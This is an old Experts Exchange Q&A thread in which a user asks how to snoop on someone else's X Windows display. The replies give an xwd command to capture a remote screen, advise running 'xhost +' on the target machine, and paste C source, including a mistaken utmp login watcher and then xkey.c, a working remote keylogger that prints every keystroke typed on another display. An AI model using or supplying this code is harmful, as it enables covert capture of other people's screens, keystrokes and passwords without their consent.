Snooping other windows in X-Windows.

Posted on 1997-06-01
Last Modified: 2013-12-26
Hi. How can I snoop another window?
In answer to my previos question dhm wrote : "There are ways to snoop on somebody else's window, but that's not what you
asked :-)". So, OK, now I'm asking , how can I snoop somebody else's window? Thanks for Your help.
Question by:dpodvaln
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 2

Accepted Solution

leendert earned 250 total points
ID: 1293159


I know of two ways to snoop someone else's window. With
both these methods you will need access via
xhost +<your machines name> from the machine you'd like to
snoop. That is you will need to enter the command
xhost +<your machine's name> from the other person's machine
if the stuff mentioned underneath does not work.

Here are the two methods:

1) This one will bring back a snapshot of the other machines

   Here is the command :
   xwd -root -display machinename:0.0  | xwud

   where machinename is the name of the machine you'd like
   to take the snapshot from.

2) The second is a .c program with wich you can see exactly
   what keystrokes the other party uses. Compile it and run
   it with the display of the other machine as parameter.

      example : xtspy machinename:0.0

Here is the .c program :

#include <sys/types.h>
#include <sys/file.h>
#include <sys/stat.h>
#include <sys/fcntl.h>
#include <stdio.h>
#include <ctype.h>
#include <utmp.h>

 * Defines to work around System V
#define bcopy(s1, s2, len) memcpy(s2, s1, len)
#define index(s, c) strchr(s, c)
#define rindex(s, c) strrchr(s, c)
#define bzero(s, len) memset(s, 0, len)
#define bcmp(s1, s2, len) (memcmp(s1, s2, len)!=0)
#define WAITIME 5

#define USIZ    (sizeof(struct utmp))

extern char *malloc ();
extern char *realloc ();
extern off_t lseek ();

static void
szprint (s, max)
char *s;
int max;
    /* catch the guy even if he puts esc. codes in ! */
    while (max-- && *s != '\0')
        if (isprint (*s))
            (void) fprintf (stderr, "%c", *s++);
            (void) fprintf (stderr, "(0x%X)", *s++);

static void
notify (old, new)
struct utmp *old;
struct utmp *new;
    char *op;
    struct utmp *u;

    u = new;
    op = "in";
    if (new->ut_name[0] == '\0')
        u = old;
        op = "out";

    szprint (u->ut_name, sizeof (u->ut_name));
    if (u->ut_line[0] != '\0')
        (void) fprintf (stderr, "@");
        szprint (u->ut_line, sizeof (u->ut_line));
    (void) fprintf (stderr, " (");
    szprint (u->ut_line, sizeof (u->ut_line));
    (void) fprintf (stderr, ") logged %s\n", op);

main ()
    time_t m_time;
    int utfd;
    struct utmp *up;
    struct utmp ubuf;
    int upsiz;
    struct stat sbuf;

    if (stat (UTMP_FILE, &sbuf) != 0 || (utfd = open (UTMP_FILE, O_RDONLY)) < 0)
        perror (UTMP_FILE);
        exit (1);
    m_time = sbuf.st_mtime;

    if ((up = (struct utmp *) malloc ((unsigned) sbuf.st_size)) == NULL)
        perror ("malloc utmp buffer");
        exit (1);
    upsiz = sbuf.st_size;

    if (read (utfd, (char *) up, (int) sbuf.st_size) != sbuf.st_size)
        (void) fprintf (stderr, "read %ld bytes from ", sbuf.st_size);
        perror (UTMP_FILE);
        exit (1);

    while (1)
        if (getppid () == 1)
            exit (0);

        (void) sleep (WAITIME);

        if (stat (UTMP_FILE, &sbuf) < 0)
            perror (UTMP_FILE);
            exit (1);

        if (upsiz < sbuf.st_size)
            up = (struct utmp *) realloc ((char *) up, (unsigned) sbuf.st_size);
            if (up == NULL)
                perror ("realloc utmp buffer");
                exit (1);
            upsiz = sbuf.st_size;

        if (sbuf.st_mtime != m_time)
            int i;

            if (lseek (utfd, 0L, 0) != 0L)

            for (i = 0; i < sbuf.st_size / USIZ; i++)
                if (read (utfd, (char *) &ubuf, USIZ) != USIZ)
                if (bcmp ((char *) &up[i], (char *) &ubuf, USIZ))
                    notify (&up[i], &ubuf);
                    (void) bcopy ((char *) &ubuf, (char *) &up[i], USIZ);
            m_time = sbuf.st_mtime;

Try the above. Hope this will solve your problem...


Expert Comment

ID: 1293160
Hi there,

I actually uploaded the wrong c file to snoop another
machines xwindows...

Here is the correct one. Sorry about that... :-}

 * To Compile, run it through gcc like
 * this :
 *    gcc -o xkey xkey.c -lX11 -lm
 * To run it, just use it like this :  xkey displayname:0
 * and watch as that display's keypresses show up in your shell window.
 *    Dominic Giampaolo (
#include <stdio.h>
#include <X11/X.h>
#include <X11/Xlib.h>
#include <X11/Intrinsic.h>
#include <X11/StringDefs.h>
#include <X11/Xutil.h>
#include <X11/Shell.h>

char *TranslateKeyCode(XEvent *ev);

Display *d;

void snoop_all_windows(Window root, unsigned long type)
  static int level = 0;
  Window parent, *children, *child2;
  unsigned int nchildren;
  int stat, i,j,k;


  stat = XQueryTree(d, root, &root, &parent, &children, &nchildren);
  if (stat == FALSE)
     fprintf(stderr, "Can't query window tree...\n");

  if (nchildren == 0)

  /* For a more drastic inidication of the problem being exploited
   * here, you can change these calls to XSelectInput() to something
   * like XClearWindow(d, children[i]) or if you want to be real
   * nasty, do XKillWindow(d, children[i]).  Of course if you do that,
   * then you'll want to remove the loop in main().
   * The whole point of this exercise being that I shouldn't be
   * allowed to manipulate resources which do not belong to me.
  XSelectInput(d, root, type);

  for(i=0; i < nchildren; i++)
     XSelectInput(d, children[i], type);
     snoop_all_windows(children[i], type);

  XFree((char *)children);

void main(int argc, char **argv)
  char *hostname;
  char *string;
  XEvent xev;
  int count = 0;

  if (argv[1] == NULL)
    hostname = ":0";
    hostname = argv[1];

  d = XOpenDisplay(hostname);
  if (d == NULL)
     fprintf(stderr, "Blah, can't open display: %s\n", hostname);

  snoop_all_windows(DefaultRootWindow(d), KeyPressMask);

     XNextEvent(d, &xev);

     string = TranslateKeyCode(&xev);
     if (string == NULL)

     if (*string == '\r')
     else if (strlen(string) == 1)
       printf("%s", string);
       printf("<<%s>>", string);

#define KEY_BUFF_SIZE 256
static char key_buff[KEY_BUFF_SIZE];

char *TranslateKeyCode(XEvent *ev)
  int count;
  char *tmp;
  KeySym ks;

  if (ev)
     count = XLookupString((XKeyEvent *)ev, key_buff, KEY_BUFF_SIZE, &ks,NULL);
     key_buff[count] = '\0';

     if (count == 0)
        tmp = XKeysymToString(ks);
        if (tmp)
          strcpy(key_buff, tmp);
          strcpy(key_buff, "");

     return key_buff;
    return NULL;


This will help you out on your problem...


Featured Post

Industry Leaders: We Want Your Opinion!

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

Title # Comments Views Activity
Expand macro to ask for filename column 8 40
Doc'in system (example?) BA 7 127
countEvens challenge 2 117
My project did see openJDK that I installed. What could be the problem 7 172
This is to be the first in a series of articles demonstrating the development of a complete windows based application using the MFC classes.  I’ll try to keep each article focused on one (or a couple) of the tasks that one may meet.   Introductio…
If you use Adobe Reader X it is possible you can't open OLE PDF documents in the standard. The reason is the 'save box mode' in adobe reader X. Many people think the protected Mode of adobe reader x is only to stop the write access. But this fe…
This video will show you how to get GIT to work in Eclipse.   It will walk you through how to install the EGit plugin in eclipse and how to checkout an existing repository.

751 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question